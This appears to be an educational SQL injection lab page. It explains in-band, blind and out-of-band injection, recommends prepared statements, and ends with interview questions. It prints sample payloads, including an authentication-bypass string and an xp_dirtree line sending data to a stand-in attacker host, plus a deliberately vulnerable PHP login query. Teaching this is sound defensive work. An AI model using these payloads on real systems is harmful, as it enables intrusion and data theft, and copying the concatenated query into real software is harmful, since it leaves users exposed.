SQL Injection Lab
SQL injection remains one of the OWASP Top 10 most critical web application risks. Learn how attackers exploit unsanitized database queries and how to defend against these attacks using modern secure coding practices.
What is SQL Injection?
SQL Injection (SQLi) is a code injection technique that exploits security vulnerabilities in an application's database layer. It occurs when user input is incorrectly filtered or not properly sanitized before being included in SQL queries, allowing attackers to manipulate query logic, bypass authentication, or extract sensitive data.
In-Band SQLi
Attacker uses the same channel to inject and receive results. Includes UNION-based and Error-based techniques.
Blind SQLi
Attacker infers data through true/false responses (Boolean-based) or time delays (Time-based) without direct output.
Out-of-Band SQLi
Attacker exfiltrates data via alternate channels (DNS, HTTP requests) when direct response is unavailable.
Interactive SQL Injection Playground
Try injecting into the login form below to see SQL injection in action.
Try an attack payload:
Enter credentials or select an attack payload to see the result.
Vulnerable Mode: User input is concatenated directly into the SQL query string. Attackers can break out of the string context and inject their own SQL commands, leading to authentication bypass and data theft.
SQL Injection Attack Types
In-Band SQLi (Classic)
The attacker uses the same channel to inject malicious SQL and receive results. The most common and straightforward type.
' OR 1=1 --- UNION-based: Uses UNION to retrieve data from other tables
- Error-based: Uses database error messages to extract information
Blind SQLi
The attacker doesn't see direct results but can infer information by observing the application's behavior or response times.
' AND SUBSTRING(password,1,1)='a' --- Boolean-based: Sends payloads that return true/false to infer data
- Time-based: Uses SLEEP() or WAITFOR DELAY to infer data through response delays
Out-of-Band SQLi
The attacker uses a different channel (e.g., DNS or HTTP requests) to receive data from the database server.
'; exec xp_dirtree '//attacker.com/table' --- DNS Exfiltration: Data sent via DNS queries to attacker-controlled server
- HTTP Exfiltration: Data exfiltrated via HTTP requests to attacker server
Prevention Techniques
Parameterized Queries (Prepared Statements)
Separate SQL logic from data by using placeholders. User input is always treated as data, never executable code.
Stored Procedures
Encapsulate SQL logic in pre-defined procedures that accept parameters. Limits dynamic query construction.
Input Validation & Sanitization
Whitelist allowed characters, enforce strict data types, and validate input format before processing.
Least Privilege Principle
Database accounts should have minimal permissions. Never use admin accounts for application queries.
Vulnerable vs Secure Code Examples
// VULNERABLE
$sql = "SELECT * FROM users
WHERE username='$_POST[user]'
AND password='$_POST[pass]'";
$result = mysqli_query($conn, $sql);// SECURE (PDO)
$stmt = $pdo->prepare(
"SELECT * FROM users
WHERE username = :user
AND password = :pass"
);
$stmt->execute([
'user' => $_POST['user'],
'pass' => $_POST['pass']
]);Interview Questions
Q1:What is SQL Injection and how does it work?
A:SQL Injection (SQLi) is a code injection technique where an attacker inserts malicious SQL statements into application input fields. When the application fails to properly sanitize input before incorporating it into database queries, the injected SQL is executed by the database, potentially exposing, modifying, or deleting data.
Q2:What are the three main types of SQL Injection?
A:1) In-Band SQLi — uses the same channel for attack and results (UNION-based, Error-based). 2) Blind SQLi — infers data through true/false responses or time delays (Boolean-based, Time-based). 3) Out-of-Band SQLi — uses alternative channels like DNS or HTTP to exfiltrate data when direct response isn't possible.
Q3:How do parameterized queries prevent SQL injection?
A:Parameterized queries (prepared statements) separate SQL code from data. Placeholders in the SQL statement are replaced with sanitized input values that are treated purely as data, never as executable SQL. The database engine compiles the query structure first, then binds parameters, making it impossible for injected SQL to alter the query logic.
Q4:Can stored procedures prevent SQL Injection?
A:Stored procedures can help prevent SQLi when they use parameterized queries internally and the application calls them with parameters. However, if a stored procedure dynamically constructs SQL using EXEC or EXECUTE IMMEDIATE with concatenated input, it can still be vulnerable. Stored procedures alone aren't sufficient — parameterization within them is essential.
Q5:What is the difference between Boolean-based and Time-based Blind SQLi?
A:Boolean-based Blind SQLi infers information by sending payloads that cause the application to return different responses (true/false, different content, HTTP status codes). Time-based Blind SQLi uses SQL commands like SLEEP() or WAITFOR DELAY to cause observable delays in responses, allowing the attacker to infer truth values from response timing when no visible difference exists in the response content.